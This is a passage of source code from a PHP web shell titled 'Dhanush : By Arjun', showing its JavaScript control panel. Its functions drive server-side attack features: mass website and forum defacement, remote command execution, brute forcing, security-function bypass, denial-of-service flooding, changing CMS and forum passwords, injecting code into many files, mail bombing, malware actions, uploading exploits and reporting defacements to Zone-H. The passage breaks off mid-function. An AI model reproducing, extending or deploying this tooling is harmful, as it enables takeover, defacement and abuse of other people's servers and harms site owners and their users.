6436 mainfun($_GET['myfilepath']);
6437}
6438else if(isset($_GET['mydirpath']))
6439{
6440 echo is_writable($_GET['mydirpath'])?"<font class=txt>< writable ></font>":"< not writable >";
6441}
6442else
6443{
6444?>
6445<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
6446<title>Dhanush : By Arjun</title>
6447<script type="text/javascript">
6448checked = false;
6449var waitstate = "<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
6450function checkedAll ()
6451{
6452 if (checked == false){checked = true}else{checked = false}
6453 for (var i = 0; i < document.getElementById('myform').elements.length; i++)
6454 {
6455 document.getElementById('myform').elements[i].checked = checked;
6456 }
6457}
6458function change_style(mystyle)
6459{
6460 window.location.href = '<?php echo $self; ?>?style='+mystyle;
6461}
6462function createsubdomain(cpaneluser,cpanelpass,noofsubdomain,subindex)
6463{
6464 var params = "cpaneluser="+cpaneluser+"&cpanelpass="+cpanelpass+"&noofsubdomain="+noofsubdomain+"&subindex="+subindex;
6465 document.getElementById("showmydata").innerHTML=waitstate;
6466 var ajaxRequest;
6467 ajaxRequest = new XMLHttpRequest();
6468
6469 ajaxRequest.onreadystatechange = function()
6470 {
6471 if(ajaxRequest.readyState == 3)
6472 {
6473 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6474 }
6475 }
6476
6477 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6478 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6479 ajaxRequest.send(params);
6480}
6481function massdeface(script,masswpdef,wpsym)
6482{
6483 var params = "massscript="+script+"&massdef="+masswpdef+"&wpsym="+wpsym;
6484 document.getElementById("showdef").innerHTML="<center><marquee scrollamount=4 width=150>It may take long time. Wait....</marquee></center>";
6485 var ajaxRequest;
6486 ajaxRequest = new XMLHttpRequest();
6487
6488 ajaxRequest.onreadystatechange = function()
6489 {
6490 if(ajaxRequest.readyState == 3)
6491 {
6492 document.getElementById("showdef").innerHTML=ajaxRequest.responseText;
6493 }
6494 }
6495
6496 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6497 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6498 ajaxRequest.send(params);
6499}
6500function urlchange(myfilepath)
6501{
6502 var mypath, mpath, i, t, j, r = "",myurl = "",splitter="";
6503 splitter = "<?php echo addslashes($directorysperator); ?>";
6504 mypath = mpath = myfilepath.split(splitter);
6505 <?php if($os == "Linux") { ?>
6506 r = "/";
6507 myurl = "<a href=javascript:void(0) onClick=\"changedir('dir','/')\">/</a>";
6508 <?php } ?>
6509 for (i = 0; i < mypath.length; i++)
6510 {
6511 if(mypath[i] == "")
6512 continue;
6513 r += mypath[i]+"<?php echo addslashes($directorysperator); ?>";
6514
6515 myurl += "<a href=javascript:void(0) onClick=\"changedir('dir','"+r+"\')\"><b>"+mypath[i]+"<?php echo addslashes($directorysperator); ?></b></a>";
6516 }
6517 myurl = myurl.replace(/\\/g,"\\\\");
6518 return myurl;
6519}
6520function wrtblDIR(mydirpath)
6521{
6522 var ajaxRequest;
6523 ajaxRequest = new XMLHttpRequest();
6524
6525 ajaxRequest.onreadystatechange = function()
6526 {
6527 if(ajaxRequest.readyState == 4)
6528 {
6529 for(i=0;i<=3;i++)
6530 document.getElementsByName("wrtble")[i].innerHTML=ajaxRequest.responseText;
6531 }
6532 }
6533
6534 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydirpath="+mydirpath, true);
6535 ajaxRequest.send(null);
6536}
6537function setpath(myfilpath)
6538{
6539 wrtblDIR(myfilpath);
6540 document.getElementById("path").value=myfilpath;
6541 document.getElementById("createfile").value=myfilpath;
6542 document.getElementById("readfile").value=myfilpath;
6543 document.getElementById("readdir").value=myfilpath;
6544 document.getElementById("createfolder").value=myfilpath;
6545 document.getElementById("createfolder").value=myfilpath;
6546 document.getElementById("exepath").value=myfilpath;
6547 document.getElementById("auexepath").value=myfilpath;
6548 document.getElementById("showdir").innerHTML="";
6549}
6550function changedir(myaction,myfilepath)
6551{
6552 var myurl = urlchange(myfilepath);
6553
6554 document.getElementById("showmaindata").innerHTML=waitstate;
6555 var ajaxRequest;
6556 ajaxRequest = new XMLHttpRequest();
6557
6558 ajaxRequest.onreadystatechange = function()
6559 {
6560 if(ajaxRequest.readyState == 4)
6561 {
6562 setpath(myfilepath);
6563 document.getElementById("crdir").innerHTML=myurl;
6564 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
6565 }
6566 }
6567
6568 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
6569 ajaxRequest.send(null);
6570}
6571function gethome(myaction,mydir)
6572{
6573 var myurl = urlchange(mydir);
6574 document.getElementById("showmaindata").innerHTML=waitstate;
6575 var ajaxRequest;
6576 ajaxRequest = new XMLHttpRequest();
6577
6578 ajaxRequest.onreadystatechange = function()
6579 {
6580 if(ajaxRequest.readyState == 4)
6581 {
6582 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
6583 setpath(mydir);
6584 document.getElementById("crdir").innerHTML=myurl;
6585 }
6586 }
6587
6588 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+mydir, true);
6589 ajaxRequest.send(null);
6590}
6591function getname(sitename)
6592{
6593 document.getElementById("showsite").innerHTML=waitstate;
6594 var ajaxRequest;
6595 ajaxRequest = new XMLHttpRequest();
6596
6597 ajaxRequest.onreadystatechange = function()
6598 {
6599 if(ajaxRequest.readyState == 4)
6600 {
6601 document.getElementById("showsite").innerHTML=ajaxRequest.responseText;
6602 }
6603 }
6604
6605 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?sitename="+sitename, true);
6606 ajaxRequest.send(null);
6607}
6608function myaction(myfileaction,chmode)
6609{
6610 var mytype = document.getElementsByName('actbox[]');
6611 var mychoice = new Array();
6612
6613 for (var i = 0, length = mytype.length; i < length; i++)
6614 {
6615 if (mytype[i].checked)
6616 mychoice[i] = mytype[i].value;
6617 }
6618
6619 var params = "choice="+myfileaction+"&chmode="+chmode+"&actbox[]="+mychoice;
6620
6621 document.getElementById("showmydata").className = "fixedbox";
6622 document.getElementById("showmydata").innerHTML=waitstate;
6623 var ajaxRequest;
6624 ajaxRequest = new XMLHttpRequest();
6625
6626 ajaxRequest.onreadystatechange = function()
6627 {
6628 if(ajaxRequest.readyState == 4)
6629 {
6630 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6631 }
6632 }
6633
6634 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6635 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6636 ajaxRequest.send(params);
6637}
6638function editdata()
6639{
6640 var result = "", // initialize list
6641 i,dbname,tablename;
6642 // iterate through arguments
6643 for (i = 1; i < arguments.length; i++)
6644 {
6645 if(i%2 == 0)
6646 result += arguments[i]+'=';
6647 else
6648 result += arguments[i]+'&';
6649 }
6650 result = result.slice(0, -1);
6651
6652 dbname = arguments[3];
6653 tablename = arguments[5];
6654 var result=result.replace(/dhanush_/g,"");
6655 var params = arguments[0]+"="+result;
6656
6657 document.getElementById("showsql").innerHTML=waitstate;
6658 var ajaxRequest;
6659 ajaxRequest = new XMLHttpRequest();
6660
6661 ajaxRequest.onreadystatechange = function()
6662 {
6663 if(ajaxRequest.readyState == 4)
6664 {
6665 viewtables('listTables',dbname,tablename);
6666 }
6667 }
6668
6669 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6670 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6671 ajaxRequest.send(params);
6672}
6673function viewtables(action,dbname,tablename,rowid,arrdata,executequery,fieldname,page)
6674{
6675 document.getElementById("showsql").innerHTML=waitstate;
6676 var ajaxRequest;
6677 ajaxRequest = new XMLHttpRequest();
6678
6679 ajaxRequest.onreadystatechange = function()
6680 {
6681 if(ajaxRequest.readyState == 4)
6682 {
6683 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
6684 }
6685 }
6686
6687 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?action="+action+"&dbname="+dbname+"&tablename="+tablename+"&"+rowid+"="+arrdata+"&executemyquery="+executequery+"&fieldname="+fieldname+"&page="+page, true);
6688 ajaxRequest.send(null);
6689}
6690function mydatabase(server,username,password)
6691{
6692 document.getElementById("showsql").innerHTML=waitstate;
6693 var ajaxRequest;
6694 ajaxRequest = new XMLHttpRequest();
6695
6696 ajaxRequest.onreadystatechange = function()
6697 {
6698 if(ajaxRequest.readyState == 4)
6699 {
6700 mydatago();
6701 }
6702 }
6703
6704 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executeit&server="+server+"&username="+username+"&password="+password, true);
6705 ajaxRequest.send(null);
6706}
6707function mydatago()
6708{
6709 var ajaxRequest;
6710 ajaxRequest = new XMLHttpRequest();
6711
6712 ajaxRequest.onreadystatechange = function()
6713 {
6714 if(ajaxRequest.readyState == 4)
6715 {
6716 document.getElementById("datatable").style.display = 'none';
6717 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
6718 }
6719 }
6720
6721 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydata", true);
6722 ajaxRequest.send(null);
6723}
6724function bruteforce(prototype,serverport,login,dict)
6725{
6726 var mytype = document.getElementsByName('mytype');
6727 for (var i = 0, length = mytype.length; i < length; i++)
6728 {
6729 if (mytype[i].checked)
6730 break;
6731 }
6732 var getreverse = 0;
6733 if(document.getElementById('reverse').checked == true)
6734 getreverse = 1;
6735 else
6736 getreverse = 0;
6737
6738 document.getElementById("showbrute").innerHTML=waitstate;
6739 var ajaxRequest;
6740 ajaxRequest = new XMLHttpRequest();
6741
6742 ajaxRequest.onreadystatechange = function()
6743 {
6744 if(ajaxRequest.readyState == 4)
6745 {
6746 document.getElementById("showbrute").innerHTML=ajaxRequest.responseText;
6747 }
6748 }
6749
6750 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?prototype="+prototype+"&serverport="+serverport+"&login="+login+"&dict="+dict+"&type="+mytype[i].value+"&reverse="+getreverse, true);
6751 ajaxRequest.send(null);
6752}
6753function executemyfile(action,executepath,execute)
6754{
6755 document.getElementById("showmydata").className = "fixedbox";
6756 document.getElementById("showmydata").innerHTML=waitstate;
6757 var ajaxRequest;
6758 ajaxRequest = new XMLHttpRequest();
6759
6760 ajaxRequest.onreadystatechange = function()
6761 {
6762 if(ajaxRequest.readyState == 4)
6763 {
6764 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6765 }
6766 }
6767
6768 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+action+"&executepath="+executepath+"&execute="+execute, true);
6769 ajaxRequest.send(null);
6770}
6771function maindata(myaction,dir)
6772{
6773 document.getElementById("showmaindata").innerHTML=waitstate;
6774 var ajaxRequest;
6775 ajaxRequest = new XMLHttpRequest();
6776
6777 ajaxRequest.onreadystatechange = function()
6778 {
6779 if(ajaxRequest.readyState == 4)
6780 {
6781 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
6782 document.getElementById("showdir").innerHTML="";
6783 }
6784 }
6785
6786 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+myaction+"&dir="+dir, true);
6787 ajaxRequest.send(null);
6788}
6789function manuallyscriptfn(sctype,passwd)
6790{
6791 var message = encodeURIComponent(passwd);
6792 var params = sctype+"="+sctype+"&passwd="+passwd;
6793 document.getElementById("showdata").innerHTML=waitstate;
6794 var ajaxRequest;
6795 ajaxRequest = new XMLHttpRequest();
6796
6797 ajaxRequest.onreadystatechange = function()
6798 {
6799 if(ajaxRequest.readyState == 3)
6800 {
6801 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
6802 }
6803 }
6804
6805 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6806 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6807 ajaxRequest.send(params);
6808}
6809function my404page(message)
6810{
6811 var message = encodeURIComponent(message);
6812 var params = "404page=404page&message="+message;
6813 document.getElementById("showdata").innerHTML=waitstate;
6814 var ajaxRequest;
6815 ajaxRequest = new XMLHttpRequest();
6816
6817 ajaxRequest.onreadystatechange = function()
6818 {
6819 if(ajaxRequest.readyState == 4)
6820 {
6821 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
6822 }
6823 }
6824
6825 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6826 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6827 ajaxRequest.send(params);
6828}
6829function executemyfn(executepath,executemycmd)
6830{
6831 var ajaxRequest,app;
6832 ajaxRequest = new XMLHttpRequest();
6833
6834 ajaxRequest.onreadystatechange = function()
6835 {
6836 if(ajaxRequest.readyState == 4)
6837 {
6838 app = "$ " + executemycmd + " : " + ajaxRequest.responseText + "\n";
6839 document.getElementById("showexecute").innerHTML=app+document.getElementById("showexecute").innerHTML;
6840 }
6841 }
6842
6843 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executepath="+executepath+"&executemycmd="+executemycmd, true);
6844 ajaxRequest.send(null);
6845}
6846function zoneh(defacer,hackmode,reason,domain)
6847{
6848 var domain = encodeURIComponent(domain);
6849 var params = "SendNowToZoneH=SendNowToZoneH&defacer="+defacer+"&hackmode="+hackmode+"&reason="+reason+"&domain="+domain;
6850 document.getElementById("showzone").innerHTML=waitstate;
6851 var ajaxRequest;
6852 ajaxRequest = new XMLHttpRequest();
6853
6854 ajaxRequest.onreadystatechange = function()
6855 {
6856 if(ajaxRequest.readyState == 4)
6857 {
6858 document.getElementById("showzone").innerHTML=ajaxRequest.responseText;
6859 }
6860 }
6861
6862 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6863 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6864 ajaxRequest.send(params);
6865}
6866function savemyfile(file,content)
6867{
6868 var content = encodeURIComponent(content);
6869 var params = "content="+content+"&file="+file;
6870 document.getElementById("showmydata").innerHTML=waitstate;
6871 document.getElementById("showdir").innerHTML="";
6872 var ajaxRequest;
6873 ajaxRequest = new XMLHttpRequest();
6874
6875 ajaxRequest.onreadystatechange = function()
6876 {
6877 if(ajaxRequest.readyState == 4)
6878 {
6879 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6880 }
6881 }
6882
6883 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6884 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6885 ajaxRequest.send(params);
6886}
6887function renamefun(file,to)
6888{
6889 document.getElementById("showmydata").innerHTML=waitstate;
6890 var ajaxRequest;
6891 ajaxRequest = new XMLHttpRequest();
6892
6893 ajaxRequest.onreadystatechange = function()
6894 {
6895 if(ajaxRequest.readyState == 4)
6896 {
6897 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6898 }
6899 }
6900
6901 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?renamemyfile&file="+file+"&to="+to, true);
6902 ajaxRequest.send(null);
6903}
6904function changeperms(chmode,myfilename)
6905{
6906 document.getElementById("showmydata").innerHTML=waitstate;
6907 var ajaxRequest;
6908 ajaxRequest = new XMLHttpRequest();
6909
6910 ajaxRequest.onreadystatechange = function()
6911 {
6912 if(ajaxRequest.readyState == 4)
6913 {
6914 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6915 }
6916 }
6917
6918 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?chmode="+chmode+"&myfilename="+myfilename, true);
6919 ajaxRequest.send(null);
6920}
6921function defacefun(deface)
6922{
6923 var ajaxRequest;
6924 ajaxRequest = new XMLHttpRequest();
6925
6926 ajaxRequest.onreadystatechange = function()
6927 {
6928 if(ajaxRequest.readyState == 4)
6929 {
6930 alert(ajaxRequest.responseText);
6931 }
6932 }
6933
6934 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?deface="+deface, true);
6935 ajaxRequest.send(null);
6936}
6937function cancel()
6938{
6939 document.getElementById("showmydata").className = "";
6940 document.getElementById("showmydata").innerHTML='';
6941}
6942function fileaction(myaction,myfilepath)
6943{
6944 document.getElementById("showmydata").className = "fixedbox";
6945 document.getElementById("showmydata").innerHTML=waitstate;
6946 var ajaxRequest;
6947 ajaxRequest = new XMLHttpRequest();
6948
6949 ajaxRequest.onreadystatechange = function()
6950 {
6951 if(ajaxRequest.readyState == 4)
6952 {
6953 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6954 }
6955 }
6956
6957 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
6958 ajaxRequest.send(null);
6959}
6960function bypassfun(funct,functvalue,optiontype)
6961{
6962 document.getElementById("showmydata").className = "fixedbox";
6963 document.getElementById("showmydata").innerHTML=waitstate;
6964 var ajaxRequest;
6965 ajaxRequest = new XMLHttpRequest();
6966 ajaxRequest.onreadystatechange = function()
6967 {
6968 if(ajaxRequest.readyState == 4)
6969 {
6970 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6971 }
6972 }
6973
6974 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?bypassit&"+funct+"="+functvalue+"&optiontype="+optiontype, true);
6975 ajaxRequest.send(null);
6976}
6977function dos(target,ip,port,timeout,exTime,no0fBytes,multiplier)
6978{
6979 document.getElementById("showdos").innerHTML=waitstate;
6980 var ajaxRequest;
6981 ajaxRequest = new XMLHttpRequest();
6982
6983 ajaxRequest.onreadystatechange = function()
6984 {
6985 if(ajaxRequest.readyState == 4)
6986 {
6987 document.getElementById("showdos").innerHTML=ajaxRequest.responseText;
6988 }
6989 }
6990
6991 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+target+"&ip="+ip+"&port="+port+"&timeout="+timeout+"&exTime="+exTime+"&multiplier="+multiplier+"&no0fBytes="+no0fBytes, true);
6992 ajaxRequest.send(null);
6993}
6994function createfile(filecreator,filecontent)
6995{
6996 var mm = filecreator.slice(0, filecreator.lastIndexOf("<?php echo addslashes($directorysperator); ?>"));
6997 var filecontent = encodeURIComponent(filecontent);
6998 var params = "filecontent="+filecontent+"&filecreator="+filecreator;
6999 document.getElementById("showdir").innerHTML=waitstate;
7000 var ajaxRequest;
7001 ajaxRequest = new XMLHttpRequest();
7002
7003 ajaxRequest.onreadystatechange = function()
7004 {
7005 if(ajaxRequest.readyState == 4)
7006 {
7007 gethome('home',mm);
7008 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
7009 document.getElementById("showmydata").innerHTML="";
7010 }
7011 }
7012
7013 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7014 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7015 ajaxRequest.send(params);
7016}
7017function createdir(create,createfolder)
7018{
7019 document.getElementById("showmydata").className = "fixedbox";
7020 document.getElementById("showmydata").innerHTML=waitstate;
7021 var ajaxRequest;
7022 ajaxRequest = new XMLHttpRequest();
7023
7024 ajaxRequest.onreadystatechange = function()
7025 {
7026 if(ajaxRequest.readyState == 4)
7027 {
7028 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
7029 }
7030 }
7031
7032 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+create+"="+createfolder, true);
7033 ajaxRequest.send(null);
7034}
7035function codeinsert(code)
7036{
7037 var code = encodeURIComponent(code);
7038 var params = "getcode="+code;
7039 document.getElementById("showcode").innerHTML=waitstate;
7040 var ajaxRequest;
7041
7042 ajaxRequest = new XMLHttpRequest();
7043
7044 ajaxRequest.onreadystatechange = function()
7045 {
7046 if(ajaxRequest.readyState == 4)
7047 {
7048 document.getElementById("showcode").innerHTML=ajaxRequest.responseText;
7049 }
7050 }
7051
7052 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7053 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7054 ajaxRequest.send(params);
7055}
7056function getmydefacedata(mydata)
7057{
7058 document.getElementById("showmydeface").innerHTML=waitstate;
7059 var ajaxRequest;
7060 ajaxRequest = new XMLHttpRequest();
7061
7062 ajaxRequest.onreadystatechange = function()
7063 {
7064 if(ajaxRequest.readyState == 4)
7065 {
7066 document.getElementById("showmydeface").innerHTML=ajaxRequest.responseText;
7067 }
7068 }
7069
7070 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
7071 ajaxRequest.send(null);
7072}
7073function getmydata(mydata)
7074{
7075 document.getElementById("showmydata").className = "fixedbox";
7076 document.getElementById("showmydata").innerHTML=waitstate;
7077 var ajaxRequest;
7078 ajaxRequest = new XMLHttpRequest();
7079
7080 ajaxRequest.onreadystatechange = function()
7081 {
7082 if(ajaxRequest.readyState == 4)
7083 {
7084 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
7085 }
7086 }
7087
7088 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
7089 ajaxRequest.send(null);
7090}
7091function getdata(mydata,myfile)
7092{
7093 document.getElementById("showdata").innerHTML=waitstate;
7094 var ajaxRequest;
7095 ajaxRequest = new XMLHttpRequest();
7096
7097 ajaxRequest.onreadystatechange = function()
7098 {
7099 if(ajaxRequest.readyState == 3)
7100 {
7101 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
7102 }
7103 }
7104
7105 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata+"&myfile="+myfile, true);
7106 ajaxRequest.send(null);
7107}
7108function getport(host,protocol,start,end)
7109{
7110 document.getElementById("showports").innerHTML=waitstate;
7111 var ajaxRequest;
7112 ajaxRequest = new XMLHttpRequest();
7113
7114 ajaxRequest.onreadystatechange = function()
7115 {
7116 if(ajaxRequest.readyState == 4)
7117 {
7118 document.getElementById("showports").innerHTML=ajaxRequest.responseText;
7119 }
7120 }
7121
7122 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?host=" + host + "&protocol=" + protocol, true);
7123 ajaxRequest.send(null);
7124}
7125function changeforumpassword(forumpass,f1,f2,f3,f4,forums,tableprefix,ipbuid,newipbpass,username,newjoomlapass,uname,newpass)
7126{
7127 document.getElementById("showchangepass").innerHTML=waitstate;
7128 var ajaxRequest;
7129 ajaxRequest = new XMLHttpRequest();
7130
7131 ajaxRequest.onreadystatechange = function()
7132 {
7133 if(ajaxRequest.readyState == 4)
7134 {
7135 document.getElementById("showchangepass").innerHTML=ajaxRequest.responseText;
7136 }
7137 }
7138
7139 ajaxRequest.open("GET", "<?php echo $_SERVER['PHP_SELF']; ?>?forumpass&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&forums=" + forums + "&prefix=" + tableprefix + "&ipbuid=" + ipbuid + "&newipbpass=" + newipbpass + "&username=" + username + "&newjoomlapass=" + newjoomlapass + "&uname=" + uname + "&newpass=" + newpass, true);
7140 ajaxRequest.send(null);
7141}
7142function forumdefacefn(index,f1,f2,f3,f4,defaceforum,tableprefix,siteurl,head,f5)
7143{
7144 var index = encodeURIComponent(index);
7145 var params = "forumdeface="+defaceforum+"&index=" + index + "&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&tableprefix="+tableprefix+"&siteurl="+siteurl+"&head="+head+"&f5="+f5;
7146 document.getElementById("showdeface").innerHTML=waitstate;
7147 var ajaxRequest;
7148 ajaxRequest = new XMLHttpRequest();
7149
7150 ajaxRequest.onreadystatechange = function()
7151 {
7152 if(ajaxRequest.readyState == 4)
7153 {
7154 document.getElementById("showdeface").innerHTML=ajaxRequest.responseText;
7155 }
7156 }
7157
7158 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7159 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7160 ajaxRequest.send(params);
7161}
7162function codeinjector(pathtomass,mode,filetype,injectthis)
7163{
7164 var injectthis = encodeURIComponent(injectthis);
7165 var params = "pathtomass="+pathtomass+"&mode=" + mode + "&filetype=" + filetype + "&injectthis=" + injectthis;
7166 document.getElementById("showinject").innerHTML=waitstate;
7167 var ajaxRequest;
7168 ajaxRequest = new XMLHttpRequest();
7169
7170 ajaxRequest.onreadystatechange = function()
7171 {
7172 if(ajaxRequest.readyState == 3)
7173 {
7174 document.getElementById("showinject").innerHTML=ajaxRequest.responseText;
7175 }
7176 }
7177
7178 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7179 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7180 ajaxRequest.send(params);
7181}
7182function sendmail(mailfunction,to,subject,message,from,times,padding)
7183{
7184 var message = encodeURIComponent(message);
7185 if(mailfunction == "massmailing")
7186 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"&from=" + from + "&message=" + message;
7187 else if(mailfunction == "dobombing")
7188 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"×=" + times + "&padding=" + padding + "&message=" + message;
7189 document.getElementById("showmail").innerHTML=waitstate;
7190 var ajaxRequest;
7191 ajaxRequest = new XMLHttpRequest();
7192
7193 ajaxRequest.onreadystatechange = function()
7194 {
7195 if(ajaxRequest.readyState == 4)
7196 {
7197 document.getElementById("showmail").innerHTML=ajaxRequest.responseText;
7198 }
7199 }
7200
7201 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7202 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7203 ajaxRequest.send(params);
7204}
7205function execode(code)
7206{
7207 var intext = document.getElementById('intext').checked;
7208 var message = encodeURIComponent(message);
7209 var params = "code="+code+"&intext="+intext;
7210 document.getElementById("showresult").innerHTML=waitstate;
7211 var ajaxRequest;
7212 ajaxRequest = new XMLHttpRequest();
7213
7214 ajaxRequest.onreadystatechange = function()
7215 {
7216 if(ajaxRequest.readyState == 4)
7217 {
7218 document.getElementById("showresult").innerHTML=ajaxRequest.responseText;
7219 }
7220 }
7221
7222 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7223 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7224 ajaxRequest.send(params);
7225}
7226function malwarefun(malwork)
7227{
7228 var malpath = document.getElementById('createfile').value;
7229 document.getElementById("showmal").innerHTML="<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
7230 var ajaxRequest;
7231 ajaxRequest = new XMLHttpRequest();
7232
7233 ajaxRequest.onreadystatechange = function()
7234 {
7235 if(ajaxRequest.readyState == 4)
7236 {
7237 document.getElementById("showmal").innerHTML=ajaxRequest.responseText;
7238 }
7239 }
7240
7241 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+malwork+"&path="+malpath, true);
7242 ajaxRequest.send(null);
7243}
7244function getexploit(wurl,path,functiontype)
7245{
7246 document.getElementById("showexp").innerHTML=waitstate;
7247 var ajaxRequest;
7248 ajaxRequest = new XMLHttpRequest();
7249
7250 ajaxRequest.onreadystatechange = function()
7251 {
7252 if(ajaxRequest.readyState == 4)
7253 {
7254 document.getElementById("showexp").innerHTML=ajaxRequest.responseText;
7255 }
7256 }
7257
7258 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?uploadurl&wurl="+wurl+"&functiontype="+functiontype+"&path="+path, true);
7259 ajaxRequest.send(null);
7260}
7261function showMsg(msg)
7262{
7263 if(msg == 'smf')
7264 {
7265 document.getElementById('tableprefix').value="smf_";
7266 document.getElementById('fid').style.display='block';
7267 document.getElementById('wpress').style.display='none';
7268 document.getElementById('joomla').style.display='none';
7269 }
7270 if(msg == 'mybb')
7271 {
7272 document.getElementById('tableprefix').value="mybb_";
7273 document.getElementById('wpress').style.display='none';
7274 document.getElementById('joomla').style.display='none';
7275 document.getElementById('fid').style.display='block';
7276 }
7277 if(msg == 'ipb' || msg == 'vb')
7278 {
7279 document.getElementById('tableprefix').value="";
7280 document.getElementById('wpress').style.display='none';
7281 document.getElementById('joomla').style.display='none';
7282 document.getElementById('fid').style.display='block';
7283 }
7284 if(msg == 'wp')
7285 {
7286 document.getElementById('tableprefix').value="wp_";
7287 document.getElementById('wpress').style.display='block';
7288 document.getElementById('fid').style.display='none';
7289 document.getElementById('joomla').style.display='none';
7290 }
7291 if(msg == 'joomla')
7292 {
7293 document.getElementById('joomla').style.display='block';
7294 document.getElementById('tableprefix').value="jos_";
7295 document.getElementById('wpress').style.display='none';
7296 document.getElementById('fid').style.display='none';
7297 }
7298}
7299function checkforum(msg)
7300{
7301 if(msg == 'smf')
7302 {
7303 document.getElementById('tableprefix').value="smf_";
7304 document.getElementById('smfipb').style.display='block';
7305 document.getElementById('myjoomla').style.display='none';
7306
7307 }
7308 if(msg == 'phpbb')
7309 {
7310 document.getElementById('tableprefix').value="phpb_";
7311 document.getElementById('myjoomla').style.display='none';
7312 document.getElementById('smfipb').style.display='block';
7313
7314 }
7315 if(msg == 'mybb')
7316 {
7317 document.getElementById('tableprefix').value="mybb_";
7318 document.getElementById('myjoomla').style.display='none';
